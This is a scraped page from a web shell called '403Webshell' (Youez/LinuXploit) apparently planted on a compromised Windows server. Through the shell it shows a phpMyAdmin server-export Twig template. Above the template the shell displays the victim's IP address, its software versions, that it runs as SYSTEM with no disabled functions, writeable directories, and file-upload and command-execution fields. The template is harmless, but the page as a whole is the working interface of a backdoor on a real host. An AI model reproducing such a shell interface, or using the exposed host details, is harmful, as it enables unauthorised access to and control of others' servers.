403Webshell
Server IP : 123.56.80.60  /  Your IP : 216.73.216.78
Web Server : Apache/2.4.54 (Win32) OpenSSL/1.1.1s PHP/7.4.33 mod_fcgid/2.3.10-dev
System : Windows NT iZhx3sob14hnz7Z 10.0 build 14393 (Windows Server 2016) i586
User : SYSTEM ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/wamp/apps/phpmyadmin5.2.0/templates/server/export/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/wamp/apps/phpmyadmin5.2.0/templates/server/export/index.twig
{% extends 'export.twig' %}

{% block title %}{% trans 'Exporting databases from the current server' %}{% endblock %}

{% block selection_options %}
  <div class="card mb-3" id="databases_and_tables">
    <div class="card-header">{% trans 'Databases' %}</div>
    <div class="card-body">
      <div class="mb-3">
        <button type="button" class="btn btn-secondary" id="db_select_all">{% trans 'Select all' %}</button>
        <button type="button" class="btn btn-secondary" id="db_unselect_all">{% trans 'Unselect all' %}</button>
      </div>

      <select class="form-select" name="db_select[]" id="db_select" size="10" multiple aria-label="{% trans 'Databases' %}">
        {% for database in databases %}
          <option value="{{ database.name }}"{{ database.is_selected ? ' selected' }}>
            {{ database.name }}
          </option>
        {% endfor %}
      </select>
    </div>
  </div>
{% endblock %}

{% set filename_hint %}
  {% trans '@SERVER@ will become the server name.' %}
{% endset %}

Youez - 2016 - github.com/yon3zu
LinuXploit